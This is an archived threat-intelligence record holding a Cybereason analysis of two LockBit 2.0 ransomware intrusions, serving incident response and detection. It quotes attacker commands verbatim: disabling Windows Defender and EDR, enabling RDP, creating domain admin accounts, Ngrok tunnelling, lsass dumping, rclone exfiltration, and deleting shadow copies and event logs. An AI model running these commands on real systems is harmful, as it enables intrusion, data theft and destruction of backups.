{
	"id": "db2fe1fe-900c-433a-b2c5-f326934c3fa5",
	"created_at": "2026-04-06T00:10:31.573997Z",
	"updated_at": "2026-04-10T13:11:18.916379Z",
	"deleted_at": null,
	"sha1_hash": "96e3a887c522c6d8d74b053bf93faca97a312a7c",
	"title": "THREAT ANALYSIS REPORT: LockBit 2.0 - All Paths Lead to Ransom",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 7703168,
	"plain_text": "THREAT ANALYSIS REPORT: LockBit 2.0 - All Paths Lead to\r\nRansom\r\nBy Cybereason Global SOC Team\r\nArchived: 2026-04-02 12:09:11 UTC\r\nThe Cybereason Global Security Operations Center (GSOC) Team issues Cybereason Threat Analysis Reports to\r\ninform on impacting threats. The Threat Analysis Reports investigate these threats and provide practical\r\nrecommendations for protecting against them.\r\nIn this Threat Analysis report, Cybereason GSOC team analysts have analyzed two different cases that involved\r\nLockBit infections, occurring at two very different time periods. Following this introduction, we describe in detail\r\nthe attack chain from the initial infection to the ransomware deployment.\r\nKey Points\r\nIntensive data exfiltration: Cybereason observed LockBit stealing large amounts of information from its\r\nvictims. The threat actors mostly used FTP and cloud file hosting solutions such as FileZilla, Rclone and\r\nMegaSync to exfiltrate the information. \r\nConstantly evolving tools and techniques: LockBit operates on a RaaS (Ransomware as a Service)\r\nmodel. The affiliates that use LockBit’s services conduct their attacks according to their preference and use\r\ndifferent tools and techniques to achieve their goal. As the attack progresses further along the kill chain, the\r\nactivities from different cases tend to converge to similar activities.\r\nEDR-aware mentality: The attackers are constantly evolving, and take into consideration that EDR tools\r\nare doing the same. Thus, the attackers are making detection, investigation, and prevention more complex\r\nby disabling EDR and other security products, while deleting the evidence to baffle forensics attempts.\r\nCybereason Managed Detection and Response (MDR): The Cybereason GSOC team has a zero-tolerance policy towards attacks involving LockBit and its affiliates, and categorizes such attacks as\r\ncritical, high-severity incidents. 
The Cybereason GSOC MDR Team issues a comprehensive report to\r\ncustomers when such an incident occurs. The report provides an in-depth overview of the incident, which\r\nhelps to understand the scope of the compromise and the impact on the customer’s environment. These\r\nreports also provide attribution information whenever possible, as well as recommendations for threat\r\nmitigation and isolation. \r\nDetected and prevented: The Cybereason Defense Platform effectively detects and prevents infections\r\nfrom LockBit and their affiliates.\r\nIntroduction\r\nIn September 2019, a new version of a worm-like ransomware was reported. This ransomware was known as\r\nLockBit. Since then, a new variant of LockBit was discovered, dubbed LockBit 2.0.\r\nhttps://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\r\nPage 1 of 36\n\nLockBit 2.0 is very efficient and can spread quickly within a target network. It also operates in a RaaS\r\n(Ransomware-as-a-service) model, which has become an increasingly popular business model for ransomware\r\noperators in the past few years, helping ransomware groups expand their reach and revenue while scaling up,\r\nwithout considerably growing their core team or expenses.\r\nRaaS is a subscription-based model that enables affiliates to use existing ransomware tools and infrastructure in\r\norder to execute ransomware attacks. 
LockBit 2.0 incentivizes affiliates to earn a percentage of each successful\r\nransom payment by leveraging their tools to compromise entire networks and systems.\r\nSimilar to other ransomware, LockBit 2.0 uploads the compromised files to a public repository, where they are\r\navailable to everyone on the internet:\r\nLockBit 2.0 portal screenshot\r\nWe have observed many different ransomware attacks which have increased massively over the past months.\r\nLockBit is one of the dominant ones, and in fact, is a highly sophisticated form of ransomware (see also: White\r\nPaper - Inside Complex RansomOps and the Ransomware Economy). Current potential LockBit 2.0 victims’\r\nbusiness sectors range from IT services, to financial institutions, to other large organizations.\r\nAfter the attackers have covered their tracks and tampered with Windows security features, deleting backups and\r\ndisabling restore features to eliminate the possibility of recovering the encrypted data, the attackers proceed to\r\nencrypt the files on the affected machines.\r\nAfter the encryption, the user receives a ransom note informing them about the encryption of the files and\r\nproviding instructions on how to decrypt them by paying the ransom:\r\nPost encryption ransom note as observed in one case study\r\nThe high demand for LockBit’s services and its effective affiliate program makes it a growing threat that should\r\nnot be overlooked. 
\r\nCybereason successfully detects LockBit’s operation and is able to facilitate the scoping of the threat, its\r\nmagnitude and spread, and thus helps impacted organizations to act on time and stop the attack from infecting\r\nmore systems and crucial assets.\r\nAnalysis\r\nAttack Life Cycle: Case Study 1\r\nAttack diagram as observed in this case study\r\nThis case study describes how LockBit affiliates penetrated a network in Q4 2021 and worked their way through it\r\nto encrypt the assets of the victim, a company in the industrial sector.\r\nInfection Vector\r\nThe affiliates working with LockBit are using their own malware and tools to launch the actual attacks on their\r\ntargets. In most of the infections that we have encountered, the infection vector that led to the delivery of LockBit\r\nwas a misconfigured service, particularly a publicly exposed RDP port. \r\nIn other cases, affiliates would use a more traditional phishing email that allows them to remotely connect to a\r\nnetwork via an employee’s computer, or utilize malicious attachments, downloads, application patch exploits or\r\nvulnerabilities to gain access to a network.\r\nCredentials Access and Reconnaissance\r\nOnce the attacker established an initial foothold on the compromised network (machine), their next step was to\r\nstart the reconnaissance activity and credentials extraction. \r\nIn this case, the attackers used tools such as Mimikatz and Netscan, a powerful network monitoring system that is\r\nused to identify the network’s structure and valuable assets on the network. 
Both of these tools were used to assist\r\nlateral movement throughout the network:\r\nThe use of Mimikatz and Netscan as seen in the Cybereason Defense Platform\r\nAs can be seen in the image below, the attacker also used taskmgr.exe (Windows Task Manager) to create a\r\nmemory dump of lsass.exe (Microsoft Local Security Authority Subsystem Service) to extract the user’s\r\ncredentials:\r\nDumping lsass.exe process memory as seen in the Cybereason Defense Platform\r\nVulnerabilities Exploitation\r\nTo achieve more stealth and gain elevated privileges, the attackers also attempted to exploit the SpoolFool\r\nvulnerability (CVE-2022-21999), which was first reported in February 2022. This vulnerability allows an\r\nunprivileged user to create arbitrary and writable directories by configuring the SpoolDirectory attribute on a\r\nprinter. \r\nSince an unprivileged user is allowed to add remote printers, an attacker can create a remote printer and grant\r\neveryone the right to manage this printer. This is then used to perform tasks such as injecting\r\nmalicious modules:\r\nExploitation of the SpoolFool vulnerability as seen in the Cybereason Defense Platform\r\nLateral Movement and Remote Code Execution\r\nThe attacker used PsExec to execute commands and other malicious executables and files on different machines\r\non the network. \r\nPsExec is a portable tool from Microsoft that lets you run processes remotely using any user's credentials. It’s\r\nsimilar to a remote access program but instead of controlling the computer with a mouse, commands are sent via\r\nthe Command Prompt.\r\nPsExec may be used by the attacker not only to manage processes on the remote computer, but also to redirect an\r\napplication’s console output to their own computer, making it appear as though the process is running locally. 
\r\nDefense Evasion\r\nImpairing Defenses\r\nAs can be seen in the image below, the attacker used PsExec to remotely execute files and tools on the affected\r\nmachines, such as:\r\nC:\\WINDOWS\\system32\\cmd.exe /c \"1.cmd\" \r\nC:\\WINDOWS\\system32\\cmd.exe /c \"rdp.bat\"\r\nThese commands were used to enable RDP connections and tamper with the Windows Defender settings. These\r\nactions were taken in order to allow the attacker to remotely connect to the machines via compromised credentials\r\nand view, transfer or manipulate every file on the user’s system.\r\nTo enable RDP connections, the attackers used the aforementioned scripts, which set the following registry value\r\nto zero; a value of zero specifies that Remote Desktop connections are enabled: \r\nHKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections \r\nThe attackers also used a Netsh command to add a rule to the Windows Firewall exceptions list, allowing\r\ninbound RDP on local port 3389:\r\nnetsh advfirewall firewall add rule name=”allow RemoteDesktop” dir=in protocol=TCP localport=3389\r\naction=allow\r\nIn addition, as part of the executed scripts activity, PowerShell was observed executing the command “-Command\r\nAdd-MpPreference -ExclusionPath *C:\\\\” which altered the Windows Defender settings by adding every file\r\nlocated under the (C:) directory to the Windows Defender exclusion list, meaning every file that is located under\r\nthis directory will not be monitored by Windows Defender. \r\nThat gave the attackers a “free hand” to operate and execute every file they desired with no interference or\r\nprevention:\r\n1.cmd enabling RDP connections and tampering with Windows security as seen in the Cybereason Defense\r\nPlatform\r\nFor the attack to execute effectively, attackers conduct preliminary actions. 
Once executed, LockBit deletes\r\nimportant records, backups, and data from the infected host in order to prevent forensics and recovery attempts of\r\nthe encrypted data:\r\nrdp.bat enabling RDP connections and tampering with Windows security as seen in the Cybereason Defense\r\nPlatform\r\nSubverting Recovery Methods\r\nThe attacker used wevtutil, a legacy Windows command-line tool for retrieving information about, and managing, event logs. The\r\ncommands in the image below were used by the attackers to clear logs that contain records of login/logout\r\nactivities or other security-related events specified by the system’s audit policy and applications.\r\nThe attackers executed this program in order to hide their tracks and avoid future forensics on the host:\r\nUsing wevtutil to clear security logs as seen in the Cybereason Defense Platform\r\nAnother method of deleting footprints that we spotted was the attacker using the ping command as a delay\r\nmechanism, allowing the ransomware process to terminate. The File System utility (fsutil.exe) is then used to\r\nprevent the malicious executable from being recovered, by overwriting its first 524KB with zeros:\r\nfsutil file setZeroData offset=0 length=524288 [Lockbit binary file path]\r\nUsing fsutil.exe and ping to delete footprints as seen in the Cybereason Defense Platform\r\nBesides the use of wevtutil, the attackers also destroyed recovery methods with the help of the tools bcdedit.exe,\r\nwmic.exe, and vssadmin.exe.\r\nBCDEdit is a command-line tool for managing the Boot Configuration Data. In this case, BCDEdit was used to\r\nensure that system boot failures are ignored and the recovery boot option disabled. 
This is also a method to make\r\nit harder for the user to retrieve their data:\r\nUsing wevtutil.exe and bcdedit.exe to prevent recovery as seen in the Cybereason Defense Platform\r\nThe Volume Shadow Copy Service is an administrative tool that provides the framework for doing volume\r\nbackups and for creating consistent, point-in-time copies of data (known as shadow copies). \r\nThe attacker used both vssadmin.exe and the Windows Management Instrumentation utility (wmic.exe) to delete the\r\nsystem’s shadow copies, and in doing so made it impossible for the user to restore to the latest restore point or\r\nuse any of the backups:\r\nUsing vssadmin.exe and wmic.exe to delete shadow copies as seen in the Cybereason Defense Platform\r\nDeactivation of AV/EDR \r\nAs part of the attack, the attackers used legitimate tools such as a small portable freeware tool called “Defender\r\nControl”, which they used to disable Windows Defender on some of the affected Windows 10 systems.\r\nThis is an easy yet effective method to disable Windows native security features:\r\nUsing “Defender Control” to disable Windows Defender as seen in the Cybereason Defense Platform\r\nAttack Life Cycle: Case Study 2\r\nAttack diagram as observed in this case study\r\nThis case study describes how LockBit affiliates penetrated a network in Q2 2022 and worked their way through it\r\nto encrypt the assets of the victim, a company in the retail industry.\r\nLateral Movement\r\nThe first activity captured in this case study involves the PsExec utility by SysInternals. 
The threat actor laterally\r\nmoved from “patient zero” to another server through the PsExec tool:\r\nPsexesvc.exe spawning child processes controlled by the attacker as seen in the Cybereason Defense Platform\r\nThis allowed the threat actors to progress their intrusion by infecting more machines. Through the attack chain,\r\nthe threat actors continuously leveraged PsExec.exe and mstsc.exe to pivot from one server to others using the\r\nfollowing command:\r\nPsexec \\\\[IP of the server] -s cmd.exe\r\nMstsc.exe and PsExec.exe launched directly from a machine with visibility as seen in the Cybereason Defense Platform\r\nPersistence \r\nAccount Creation\r\nThe threat actors used net.exe to create a domain account and elevate its privileges to “domain administrator”\r\nthrough the following commands:\r\nC:\\Windows\\system32\\net1 user /domain [Created attacker username] /add\r\nC:\\Windows\\system32\\net1 user\r\nC:\\Windows\\system32\\net1 user /domain [Created attacker username] Numlock!123 /add\r\nC:\\Windows\\system32\\net1 group \"domain admins\" [Created attacker username] /add\r\nThis implied that the attacker already had high privileges on the Active Directory domain of the victim:\r\nNet.exe and net1.exe being leveraged to create a domain user and assign it to the “administrators” domain group\r\nThe threat actor then used this account to persist and spread on the victim’s network.\r\nPersistent Network Tunnel\r\nThe threat actor launched the following commands on 11 machines (10 servers, 1 workstation):\r\nlssas.exe tcp 3389 
--log=stdout\r\nlssas.exe config add-authtoken 28hJ[...]KW27Jpi\r\nThe binary named “lssas.exe” is masquerading as “lsass.exe” (the Windows process that handles\r\nauthentication on the system) but is in fact the infamous tunneling tool, “Ngrok”:\r\nLssas.exe (in fact, Ngrok) deployed on one of the affected machines through PsExec as seen in the Cybereason\r\nDefense Platform\r\nNgrok is a legitimate reverse proxy tool that is able to create a tunnel to servers located behind firewalls. It is also\r\nable to tunnel traffic to local machines that do not have a public IP. Ngrok has been utilized by threat actors in\r\nmany campaigns and is well known for its use in lateral movement and data exfiltration. \r\nExecuting Ngrok gave the attackers the ability to access the network remotely, even if the initial infection vector is\r\nlater patched or removed. The Cybereason GSOC team then observed RDP sessions initiated through this tunnel:\r\nRemote interactive sessions executed through the Ngrok tool tunneling RDP traffic as seen in the Cybereason\r\nDefense Platform\r\nCredential Theft\r\nThe threat actor then proceeded to steal further credentials on the network, in order to extend their access on the\r\nnetwork. 
In this case study, the threat actors interactively used the Windows executable taskmgr.exe to dump the\r\nmemory of the process lsass.exe:\r\nLsass.exe process dumping through the taskmgr.exe executable as seen in the Cybereason Defense Platform\r\nThe attackers then copied the memory dump file back onto the machine they controlled, using remote desktop\r\n(RDP) access and the tunnel created earlier. They then used tools such as “Mimikatz” to extract credentials from\r\nthe dump file.\r\nA day later, as the attack progressed, the threat actors continued their credential collection activity by launching\r\nthe Windows executable ntdsutil.exe on one of the domain controllers:\r\nNtdsutil.exe command-line tool executed on one of the domain controllers as seen in the Cybereason Defense\r\nPlatform\r\nThis granted the attackers access to all Active Directory account names and password hashes, enabling them to\r\neventually attempt to recover the plaintext passwords.\r\nData Exfiltration\r\nOnce the LockBit affiliate achieved persistent remote access and sufficient credentials, they proceeded to collect\r\nand exfiltrate the data.\r\nThe actors used three different tools for that purpose:\r\nFilezilla.exe to connect to a remote FTP service controlled by the attacker\r\nRclone.exe to exfiltrate data to a “Mega”-related cloud hosting service\r\nMegasync.exe tool to exfiltrate data to a “Mega”-related cloud hosting service\r\nFirst, the threat actor installed and launched the filezilla.exe client using the following command lines:\r\nC:\\Users\\[Username]\\Downloads\\FileZilla_3.59.0_win64_sponsored-setup.exe\r\nFilezilla.exe\r\nHighlighted connections to one IP address in particular, 185.81.68.180, on random ports 50749, 54001,\r\n59516 and 59705 as seen in the Cybereason Defense Platform\r\nThe Cybereason GSOC team observed the exfiltration activity related to “Filezilla” on six servers. After this\r\nexfiltration method was used, the threat actor leveraged Rclone.exe to exfiltrate data again, using the following\r\ncommands:\r\nrclone config\r\nrclone copy \"[HR data folder path]\" [remote path]:[remote path]\r\nThis activity is captured below. One can observe that the executable is launched through PsExec and generates\r\nunusually high network traffic:\r\nRclone.exe leveraged to exfiltrate data to mega.co.nz as seen in the Cybereason Defense Platform\r\nFinally, the threat actor used a third tool to exfiltrate data to Mega[.]co[.]nz cloud hosting servers. The tool used\r\nfor this is called Megasync.exe. The attackers ran the following commands to exfiltrate the data: \r\nC:\\Users\\[Username]\\Downloads\\MEGAsyncSetup64.exe\r\nC:\\Users\\[Username]\\AppData\\Local\\MEGAsync\\MEGAsync.exe\r\nC:\\Users\\[Username]\\AppData\\Local\\MEGAsync\\MEGAsync.exe /uninstall\r\nThe Cybereason GSOC team only observed the exfiltration activity related to Mega on the company’s main file\r\nserver.\r\nNetwork Discovery \r\nAt this point, the threat actor had been present on the network for a while and had access to multiple servers and\r\nworkstations. In order to progress to its next and final phase, data encryption, the attacker needed a list of all the\r\nassets of the victim. The actor leveraged the “Advanced IP Scanner” tool in order to identify as many machines as\r\npossible. 
\r\nThis tool is meant to actively discover hosts and their hosted services. The attacker launched it from two different\r\nservers that served as “pivoting” machines for the actor:\r\nAdvanced IP scanner creating network connections and spawning remote desktop process (mstsc.exe) as seen in\r\nthe Cybereason Defense Platform\r\nThe actor also used the tool’s built-in remote desktop client feature to spawn child mstsc.exe processes that are meant\r\nto connect through the remote desktop service, or RDP. We have observed a very high number of connections to\r\ninternal IP addresses.\r\nAt approximately the same time, the actor also infected 15 additional machines with the malware “Neshta”.\r\nNeshta is a file infector which injects its malicious code into targeted executable files:\r\nNeshta was injected into many executables, also spawning the “svchost.com” process as a result, which spawns\r\nthe legitimate executable again as a child process as seen in the Cybereason Defense Platform\r\nAs previously reported by the community, some LockBit attacks and other ransomware attacks (REvil/Sodinokibi,\r\nfor instance) have been found to coincide with Neshta infections in the same environment. 
\r\nWe did not find evidence of deliberate use of Neshta by the attackers, and hence we strongly\r\nbelieve that the tools the attackers used were pre-infected with Neshta:\r\nSource: https://twitter.com/AltShiftPrtScn/status/1519265746630717440\r\nAt this point, the LockBit affiliate had completed all the necessary steps to execute the LockBit payload and\r\ncommence encryption:\r\nPersistence on the network through multiple infected machines\r\nAccess to top-privilege accounts\r\nCollected and exfiltrated victim data\r\nA list of most assets through network discovery and scans\r\nDefense Evasion and Impact Phases\r\nThis section describes the “Defense Evasion” and “Impact” phases (according to the MITRE ATT\u0026CK Tactic\r\nclassification).\r\nApproximately four hours before the global deployment of the LockBit ransomware, the attacker bypassed\r\nexisting security features and also deleted evidence in order to complicate investigation and forensics attempts.\r\nSecurity Products Deactivation Attempts\r\nFirst, the threat actor attempted to disable the Cybereason sensors, directly from the impacted machine. For that\r\npurpose, they used the following two commands:\r\nCrDrvCtrl disable test, which attempts to disable the driver installed by the EDR\r\nWmic product where name=”Cybereason Sensor” call uninstall /noninteractive, which attempts to\r\nuninstall the sensor on the machine\r\nThreat actor attempting to disable Cybereason’s sensor as seen in the Cybereason Defense Platform. This attempt\r\nfailed.\r\nThreat actor attempting to uninstall Cybereason’s sensor as seen in the Cybereason Defense Platform. This\r\nattempt failed.\r\nBoth attempts failed in the context of the victim. 
The threat actor then attempted to disable EPP/AV products on\r\nthe different machines. Bitdefender was targeted first, through an attempt to unload the Bitdefender mini-filter driver with\r\nthe command: \r\n“fltmc” unload gzflt\r\nThreat actor disabling BitDefender mini-filter as seen in the Cybereason Defense Platform\r\nA few minutes before launching the ransomware, the attacker also launched “defendercontrol.exe” on 14 servers.\r\nAs stated in the previous case study, Defender Control is used to disable Microsoft Defender:\r\nLaunching of “defendercontrol.exe” as seen in the Cybereason Defense Platform\r\nIn addition to the use of “defendercontrol.exe”, the attacker launched the following commands, which were started\r\nfrom a service created by the attacker, named “TrustedInstaller”:\r\n“PowerShell -nop -win 1 -c \u0026 {$AveYo=' A LIMITED ACCOUNT PROTECTS YOU FROM UAC\r\nEXPLOITS ';$env:1=6;$k=@();$k+=gp Registry::HKEY_Users\\S-1-5-21*\\Volatile* ToggleDefender -ea\r\n0;iex($k[0].ToggleDefender)}”\r\nMpCmdRun.exe -DisableService\r\nNet1.exe stop windefend - D\r\nsc.exe config windefend depend=RpcSs-TOGGLE\r\nThreat Actor launching a PowerShell one-liner command to disable EPP/Antivirus products as seen in the\r\nCybereason Defense Platform\r\nIn order to execute all the activities related to “Defense Evasion”, the actor used a batch script to automate the\r\nexecution: \r\nBatch scripts launched remotely on the targeted machines\r\nRansomware Deployment \r\nThe threat actor launched the Lockbit ransomware executable. 
The threat actor used three different methods for\r\nthis purpose: \r\nManual deployment through RDP \r\nSemi-automated deployment with “PsExec” through the ransomware binary itself\r\nCreation of a dedicated GPO (Group Policy Object) on the main Active Directory forest\r\nThe GPO created scheduled tasks that:\r\nAttempted to kill security-related and backup-related products’ processes \r\nStopped many application-related services (for instance, SQL engine services)\r\nLaunched the Lockbit ransomware executable \r\nExtract from the GPO created by the attacker\r\nThe ransomware executed on the victim machines was “Lockbit 2.0”. It was configured to automatically spread to\r\nall configured targets and thus created internal network connections:\r\nLockbit ransomware deployment and activity as seen in the Cybereason Defense Platform\r\nIt also spawned multiple child processes including: \r\n\"C:\\Windows\\SysWOW64\\mshta.exe\"\r\n\"C:\\Users\\TEMP\\Desktop\\LockBit_Ransomware.hta\" [GUID]\r\nPreparing the Machines for Encryption \r\nThe Lockbit ransomware launched cmd.exe which created different child processes in order to prepare the\r\nmachine for encryption. 
The following commands were issued by the executable: \r\nvssadmin delete shadows /all /quiet\r\nbcdedit /set {default} recoveryenabled No\r\nwmic SHADOWCOPY /nointeractive\r\nping 127.0.0.7 -n 3\r\nfsutil file setZeroData offset=0 length=524288 \"C:\\Windows\\LockBit_[Random number].exe\"\r\nLockBit ransomware execution preparing the machine for encryption with backup deletion and machine performance modification as\r\nseen in the Cybereason Defense Platform\r\nThis activity is exactly the same as the one documented in the first case study. You can refer to the first case study\r\nfor more information.\r\nLog Deletion\r\nThe event log deletion phase happened at approximately the same time as the launch of the ransomware. \r\nThe activity is similar to that documented in the first case study, but shows an enhancement over the first case\r\nstudy’s log deletion attempts: many event sources are targeted, instead of just the “security”, “system” and\r\n“application” Windows event logs: \r\nListing of wevtutil.exe commands launched by the attacker\r\nThe command “Wevtutil CL [Event source]” is used to clear local Windows event logs.\r\nA Glance Into the IOCs\r\nThe infrastructure in use by the attacker that was identified in the second case study is heterogeneous, depending on\r\nthe tool used:\r\nFor persistence and exfiltration activities, the attacker leveraged cloud servers. 
For instance, subdomains\r\nfrom “userstorage.mega.co.nz” or “ngrok.io” (rclone.exe tool, megasync.exe tool, ngrok tool)\r\nFor another exfiltration tool, Filezilla, which is an FTP client, the context is different: an IP address stood\r\nout, 185.81.68[.]180, located in Russia\r\nThe Cybereason GSOC team analyzed the infrastructure related to this IP address and identified the following key\r\npoints:\r\nThe IP address has no detections in VirusTotal\r\nThe service provider is located in Russia\r\nThe ISP company, based in Cyprus, is named Starcrecium, associated in the past with other malicious\r\nactors\r\nMany network services were observed on the IP address, including remote desktop, HTTP, FTP, WinRM\r\nThe TLS certificate associated with the RDP service is issued for “WIN-LIVFRVQFMKO”, which is a\r\ncommon name for a machine, also associated with other malicious activities \r\nIP address 185.81.68[.]180 - Service analysis\r\nIP address 185.81.68[.]180 - Hosting Company analysis\r\nLink Repository\r\nVirusTotal - Link #1 - https://www.virustotal.com/gui/ip-address/193.27.228.247/detection\r\nActive VPN Reconnaissance - Link #2 - https://www.securityondemand.com/active-vpn-reconnaissance-campaign-from-russia-based-ip/\r\nLOREC53 activity - Link #3 - https://nsfocusglobal.com/apt-retrospection-lorec53-an-active-russian-hack-group-launched-phishing-attacks-against-georgian-government/\r\nAbuseIPDB - Link #4 - https://www.abuseipdb.com/check/45.135.232.93?page=4\r\nAlienVault pulse - Link #5 - https://otx.alienvault.com/pulse/61348def9b7e45731d8bef82\r\nDetection and Prevention\r\nCybereason Defense Platform\r\nThe Cybereason Defense Platform is able to detect and prevent infections with LockBit using multi-layer\r\nprotection that detects and blocks 
malware with threat intelligence, machine learning, and Next-Gen Antivirus (NGAV) capabilities:\r\nThe Cybereason Defense Platform creates a MalOp out of the execution of the LockBit binary \r\nThe Cybereason Defense Platform identifies the malicious code injection and executable\r\nCybereason GSOC MDR\r\nThe Cybereason GSOC recommends the following:\r\nEnable the Anti-Malware feature on the Cybereason NGAV and enable the Detect and Prevent modes of this feature. \r\nEnable the Anti-Ransomware feature on the Cybereason NGAV and enable the Detect and Prevent modes of this feature.\r\nSecurely handle files downloaded from the Internet and email messages that originate from external sources.\r\nThreat Hunting with Cybereason: The Cybereason MDR team provides its customers with custom hunting queries for detecting specific threats - to find out more about threat hunting and Managed Detection and Response with the Cybereason Defense Platform, contact a Cybereason Defender here.\r\nFor Cybereason customers: More details are available on the NEST, including custom threat hunting queries for detecting this threat.\r\nCybereason is dedicated to teaming with defenders to end cyber attacks from endpoints to the enterprise to everywhere. 
Schedule a demo today to learn how your organization can benefit from an operation-centric approach to security.\r\nIndicators of Compromise\r\nExecutables\r\nSHA-256 hash: Neshta - svchost.com\r\nb462d28ae1f49b389d1df0213eafc75daf2ce681db989a363348d7f19379c02b\r\nSHA-1 hash: \r\ndb6e1a1dbb0e351c44b49db79b8bad3321d673a1\r\nSHA-256 hash: DefenderControl.exe \r\nce162d2d3649a13a48510e79ef0046f9a194f9609c5ee0ee340766abe1d1b565\r\nIP addresses: 185.81.68.180\r\nMITRE MAPPING\r\nThe table below summarizes the activities that are most prevalent across all infections with LockBit that the Cybereason MDR team has observed:\r\nAbout the Researchers\r\nLoïc Castel, Principal Security Analyst, Cybereason Global SOC\r\nLoïc Castel is a Senior Security Analyst with the Cybereason Global SOC team. Loïc analyses and researches critical incidents and cybercriminals, in order to better detect compromises. In his career, Loïc worked as a security auditor in well-known organizations such as ANSSI (French National Agency for the Security of Information Systems) and as Lead Digital Forensics \u0026 Incident Response at Atos. Loïc loves digital forensics and incident response, but is also interested in offensive aspects such as vulnerability research.\r\nGal Romano, Senior Security Analyst, Cybereason Global SOC\r\nGal Romano is a Senior Security Analyst with the Cybereason Global SOC (GSOC) team. He is involved in malware analysis, mobile malware analysis, and threat hunting activities. Gal was involved in several milestone projects in Cybereason, such as the SOC Extended Detection and Response (XDR) initiative, and the Linux hunting team.\r\nSource: https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom"
	],
	"report_names": [
		"threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eecf54a2-2deb-41e5-9857-fed94a53f858",
			"created_at": "2023-01-06T13:46:39.349959Z",
			"updated_at": "2026-04-10T02:00:03.296196Z",
			"deleted_at": null,
			"main_name": "SaintBear",
			"aliases": [
				"Bleeding Bear",
				"Cadet Blizzard",
				"Nascent Ursa",
				"Nodaria",
				"Storm-0587",
				"DEV-0587",
				"Saint Bear",
				"EMBER BEAR",
				"UNC2589",
				"TA471",
				"UAC-0056",
				"FROZENVISTA",
				"Lorec53",
				"Lorec Bear"
			],
			"source_name": "MISPGALAXY:SaintBear",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "03a6f362-cbab-4ce9-925d-306b8c937bf1",
			"created_at": "2024-11-01T02:00:52.635907Z",
			"updated_at": "2026-04-10T02:00:05.339384Z",
			"deleted_at": null,
			"main_name": "Saint Bear",
			"aliases": [
				"Saint Bear",
				"Storm-0587",
				"TA471",
				"UAC-0056",
				"Lorec53"
			],
			"source_name": "MITRE:Saint Bear",
			"tools": [
				"OutSteel",
				"Saint Bot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "083d63b2-3eee-42a8-b1bd-54e657a229e8",
			"created_at": "2022-10-25T16:07:24.143338Z",
			"updated_at": "2026-04-10T02:00:04.879634Z",
			"deleted_at": null,
			"main_name": "SaintBear",
			"aliases": [
				"Ember Bear",
				"FROZENVISTA",
				"G1003",
				"Lorec53",
				"Nascent Ursa",
				"Nodaria",
				"SaintBear",
				"Storm-0587",
				"TA471",
				"UAC-0056",
				"UNC2589"
			],
			"source_name": "ETDA:SaintBear",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Elephant Client",
				"Elephant Implant",
				"GraphSteel",
				"Graphiron",
				"GrimPlant",
				"OutSteel",
				"Saint Bot",
				"SaintBot",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434231,
	"ts_updated_at": 1775826678,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/96e3a887c522c6d8d74b053bf93faca97a312a7c.pdf",
		"text": "https://archive.orkl.eu/96e3a887c522c6d8d74b053bf93faca97a312a7c.txt",
		"img": "https://archive.orkl.eu/96e3a887c522c6d8d74b053bf93faca97a312a7c.jpg"
	}
}